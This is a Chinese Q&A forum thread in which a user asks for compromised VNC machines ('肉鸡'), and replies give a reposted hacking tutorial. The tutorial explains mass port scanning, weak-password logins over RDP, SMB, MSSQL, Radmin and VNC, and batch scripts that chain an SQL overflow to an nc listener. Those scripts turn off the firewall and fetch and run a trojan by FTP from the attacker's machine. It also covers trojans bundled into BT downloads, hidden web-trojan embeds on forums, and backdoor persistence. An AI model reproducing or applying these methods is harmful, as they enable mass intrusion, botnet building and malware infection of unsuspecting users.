注意是vnc,而且我不知道任何可能存在肉鸡的IP,谁 给几个更好,谢谢了工作需要,请积极回答,请不要删除
郁闷啊你的问题一提出来我就找了几篇文章给你参考(只写了网址,连标题都没敢写)结果死活不能通过审核我只好放弃了今天进来一看居然直接告诉你方法的回答都可以发表出来编辑的审核标准差距如此之大让我们这些回答问题的人真是感觉无所措手足
提问者对答案的评价:
VNC是一种可以远程桌面控制的东东,就算别人是VNC,连接时也会要求密码的,黑客也不会将密码告诉你,当然除非他卖给你肉机。要想知道谁是肉机,当然得黑别人的机,然后再给对方安装VNC才行。不过这样的行为是违法行为,抓住会被送到公安局的。
违法的大意是找黑客攻入肉鸡的计算机,窃取想要的东西,就是这样啊
非常简单:首先你要有VNC扫描器,用以下的格式在CMD下进行扫描vnc.exe -i *.*.*.*-*.*.*.* -p 5900 -vnc中间部分是你要扫的IP范围,在扫描的结果中如果有vnc4:VULNERABLE你试一下如果没有密码就可以用vnc登陆器登陆了至于所说的工具你可以在网上找找,实在找不到给我发消息,我可以送给你
捉肉鸡方法[转]首先得准备一只免杀鸽子或者其他的远控,一个免费空间,一些工具(下面会提到)1、扫3389端口抓肉鸡(适合新手)(抓不了国外肉鸡)现在国内网络上流传着一种克隆版的XP,安装后会默认开启一个账号为new,密码为空的账户,而且基本上都是开着3389的,我们就可以利用这一点来抓肉鸡。首先用端口扫描工具(如S扫)扫一段IP的3389端口,扫完后就直接用远程桌面连接开放3389的机器(也可以把结果保存为文本文件,用批量生成3389连接的工具来连接),然后输入账号new登入,如果别人的电脑前没人的话你就可以去你的空间下载你传好的木马安装拉~~这种方法只针XP系统,如果遇到2000或者2003系统就不要试了呵呵。缺点也很明显,如果别人不是用new账号登入XP的,你再登入上去就会把他挤出去(XP只支持单用户登入,用户登入需要用工具开),或者电脑前有人你就不可能去打开IE下载木马了。2、扫135端口抓肉鸡首先先用端口扫描器扫一段IP的135端口,然后把结果保存,再用NTSCAN过滤有弱口令的机器,最后用recton开telnet传马。因为现在135和445端口都被防火墙屏蔽了,只能扫本地的135肉鸡,要抓外地的只能用外地的135肉鸡来扫。(详细动画可以去黑客网站搜索135)3、扫445端口抓肉鸡和扫135抓肉鸡差不多,首先先用端口扫描器扫一段IP的445端口,然后把结果保存,再用NTSCAN过滤有弱口令的机器,最后用啊D工具包开共享传马。因为现在135和445端口都被防火墙屏蔽了,只能扫本地的445肉鸡,要抓外地的只能用外地的445肉鸡来扫。(详细动画可以去黑客网站搜索445)4、1433端口批量溢出抓肉鸡这个方法可以实现全自动抓鸡,不过现在太多人搞,成功率已经不高了。要用到的工具:S扫 sqlhello.exe nc.exe 批处理文件首先先写个批处理,打开记事本,把以下代码复制修改后,储存为扫描+溢出.bat文件@echo offfor /f "eol=; tokens=1,2 delims= " %%i in (tt.txt) do s.exe tcp %%i %%j 1433 1000 /save@echo offfor /f "eol=; tokens=1 delims= " %%i in (Result.txt) do sqlhello %%i 1433 xxx.xxx.xx.xx 556还要新建一个tt.txt,里面你要扫的IP段,格式为XXX.XXX.XXX.XXX XXX.XXX.XXX.XXX,中间是空格1433是要扫描的端口,1000是扫描线程数 ,do sqlhello %%i 1433 xxx.xxx.xx.xx 556 这个里的XXX添你的IP,556是后面NC监听的端口然后再写个批处理@echo offNc -l -vv -p 556>daima.txtecho username>>daima.txtecho password>>daima.txtecho bin>>daima.txt(以2进制传输数据)echo get xxx.exe(你的木马的文件名,要放在根目录下)>>daima.txtecho bye>>daima.txtnet stop sharedaccess(关闭WINDOWS自带防火墙)ftp -s:daima.txtxxx.exe(也是填你木马的文件名)del daima.txt注意上面的代码回车符别删掉,要不然就没法下你的马了。更多的代码去http://publish.it168.com/2005/0731/20050731019501.shtml这里看上面的步骤都搞好后,就可以开始扫肉鸡了。先打开多个NC.bat,然后再打开扫描+溢出.bat,然后你就可以去睡大觉了。自动扫描,扫描完后自动溢出,溢出后还自动下马执行,爽吧!所以这里讲详细点,呵呵。还有42 21端口也可以这样溢出,只要用这些端口的溢出工具就好了,详细动画可以去黑客网站搜索1433。忘了说,上面的工具和批处理什么的都要放在同一个文件夹下。先休息一下,打这么多字累死了继续5、扫1433抓肉鸡之方法2要用到的工具:端口扫描器 X-scan SQL综合利用工具上面我们说过了,1433溢出现在成功率已经不高了,所以我们可以用另一种方法。开了1433端口的机器一般都装了SQL,所以我们可以猜测SQL弱口令来抓1433肉鸡。首先先用端口扫描器扫一段IP的1433端口,然后结果保存为文本文件,接着用X-scan导入这些开了1433的IP,然后在扫描参数-全局设置-扫描模块这一栏里只勾上SQL-SERVER就可以了,其他不要勾。然后在插件设置-端口相关设置-待检测端口这一栏,只填1433端口。然后就可以开始扫描了。扫描完成后会有个报告,列出了有弱口令的机器,然后打开SQL综合利用工具,输入你扫到的弱口令来连接,接着打开SQL综合利用工具-利用目录,上传你的木马,然后在用DOS命令执行你的木马就OK了。6、用WINNTAutoAttack扫SA弱口令抓肉鸡其实这个原理和上面一样,效率也没上面的高,只是想让大家知道下,呵呵。工具:WINNTAutoAttack SQL综合利用工具打开WINNTAutoAttack,找一段IP添上,然后只勾上设置下的仅对PING检查成功的机器进行检测和SQL列出密码为空的SA账号,接着开始扫描,扫完后,用 SQL综合利用工具连上传马执行就好了。7、扫4899空口令抓肉鸡工具:端口扫描器 4899探测器 Radmin首先先用端口扫描器扫一段IP的4899端口,然后用4899探测器导入开了4899端口的IP,接着扫空令,最后用Radmin连接有空口令的机器,带开文件管理,上传的你木马运行就OK了。详细动画可以去黑客网站搜索48998、扫5900端口抓VNC肉鸡工具:VNC扫描器 VNC连接器首先用VNC扫描器扫描一段IP,扫描格式为vscan.exe(扫描器文件名) -i 219.0.0.0-219.255.255.255(扫描IP段) -p 5900 -vnc -vv扫描完成后会在扫描器所在的同一文件夹生成一个文本文件,打开后有一列IP,IP后面的有一些单词比如patched,banned,vulnerable,只有单词为vulnerable才能连接。接着就用VNC连接器连接,下面就不用多说了吧? 详细动画可以去黑客网站搜索VNC接下来说说挂马抓肉鸡吧。方法有很多,比如BT挂马、免费空间挂马、迅雷挂马等等,有些我也还不会,呵呵。下面就介绍几种我会的。1、BT挂马顾名思义,就是把你的木马发布到BT网站让人下载。当然如果只把单纯的木马文件发布上去效果肯定不好,而且现在一般的BT网站也不让发布EXE文件。所以我们需要一些隐藏的手法。我们可以先把木马用捆绑器和一些电影、音乐、游戏捆绑在一起,再压缩成RAR文件发布,谁在开始下载时会知道RAR里有木马呢?当他费了好大劲下载完,打开发现是EXE的格式后,总有些菜鸟会不想辜负自己花费的时间而忍不住打开吧?尤其是下XXX片的时候 当然你也可以做个网页木马,然后把你网页木马的地址插入到你发布的文件中(不是所有文件都可以这样的,我只知道RM和EXE文件可以插入),别人下载打开后同时也会带开你的网页木马,如果他的系统没有补供你网页木马所利用的漏洞的话,那他就会中你的马了。有些朋友可能会想,我把木马和其他文件捆绑后格式保持为那个文件(比如RM捆绑木马后保持RM格式),那样别人不就不会怀疑了吗?呵呵,如果真有这样的好事那我上面何不说把木马和BT种子文件绑在一起发布,那样你肉鸡不抓疯了才怪~~所以在这里说一下,木马和其他文件捆绑后生成的文件只能为EXE格式的,除非你有你所捆绑文件的格式的溢出漏洞,那样才能把生成后的文件格式保持为你所捆绑文件的格式。不过这样的漏洞现在很少,大多都被补了,就算有别人也不一定会公开,为什么想想就知道了吧。在这里就说一个最近的RAR溢出漏洞,针对winrar3.6版本以下的所有版本,只要你winrar版本低于3.6,运行绑了牧马的RAR文件后就会中马。此类木马症状为:运行RAR文件后会弹出一个什么什么损坏还是错误的对话框,然后RAR文件体积变小,减少的体积就为木马的体积。然后再次打开这个RAR文件一切正常,不会弹出错误对话框。在这里提醒下各位赶快更新下WINRAR版本,小心中马哈。 :lol2、免费空间挂马其实和BT差不多,就是把做好的木马上传到你申请的免费空间,然后到论坛发些诱惑性的帖子让别人下载你的木马。优点是不用像BT那样做种子,那样不仅要开着电脑,还影响网速。我这几天就是这样挂的,弄个免费空间,上传个木马,到2个XXX论坛发个帖子,每天睡前一顶,才挂了几天,现在每天肉鸡都保持在40-60只。而且大部分都是美国的,很容易吧? :lol :lol3、用RM在论坛挂马首先你弄个只有几秒钟的RM文件,然后插入你的网页木马,接着上传到你的空间,然后到一些支持插入RM连接的论坛发帖子,点插入real media 播放器,输入你的RM牧马地址,然后高度宽度都设为1(这部是为了保证隐蔽性:lol ),然后点发贴,这样别人在浏览你的帖子就会运行你的RM木马,而我们前面把高和宽设为1,在帖子里RM连接就看不到了。这样别人就不知不觉中了我们的马了:lol 好像FLASH木马也可以这样的,我没试过,大家可以去研究下。4、入侵网站挂马这个我也不会,准备学习,在这里也提一下吧。比如你要入侵一个网站,首先得用工具扫一下漏洞,然后凭借这些漏洞上传你做好的ASP网马,然后运行你的ASP网马,你就可以对这个网站的网页进行一系列修改,比如在他主页插入你的木马地址,这样别人在浏览这个网站的主页时就会中你的马了。中间过程也挺复杂了,我也只了解一点点,如果说错了还请各位批评指正。快速肉鸡扫描法~首先,你需要一个小东西,nc.exe。(什么东西?!~◎#¥%……※×(---)阿嘎嘎,我也不知道,自己慢慢的搜索引擎里面找,你认为是什么就是什么了撒。^_^ 接着编辑一个bat批处理文件。(什么是批处理,晕,来一个人送我去医院,哦,不是一群人。阿嘎嘎) ----------cut here--------------------- @echo off :start nc -vv -w 5 -l -p 80>>httpd.log goto start ----------cut here--------------------- 运行批处理程序之后,你就等着肉鸡上门来找你吧,阿嘎嘎。 (注:多为2000,中毒的主机,注意区分地区,有国外的主机,像我这里是拨号上网,一般来说,每天10个不成问题,中间夹杂着韩国的主机。) 肉鸡特征: 1。unicode漏洞 2。guest密码为空,administrators组用户 3。其他漏洞 自己慢慢的爽去吧。不过,再次强调一句,不建议而且是不能破坏国内主机,上去以后将tftp.exe改名。然后用pskill干掉mmc.exe进程,之后是杀毒。做好后门以后,将guest帐号停用,以对付傻瓜扫描器。.........中间省略45037字。........尽量抓3389,用3389给肉鸡打补丁。之后就要恭喜你,你终于有自己的主机了,只是最好不要随便外传。 两种好处: 1。你有肉鸡用。 2。向那些傻瓜级的网管学习怎么管理主机。 两种坏处: 1。暴露自己,被白帽子盯上。 (有这样的可能性,不过连补丁都不晓得的网管怕他干什么。) 2。过于的相信自己是黑客 (我还是老老实实的看书,不懂汇编永远不是黑客,我不懂所以我不是。阿嘎嘎) |
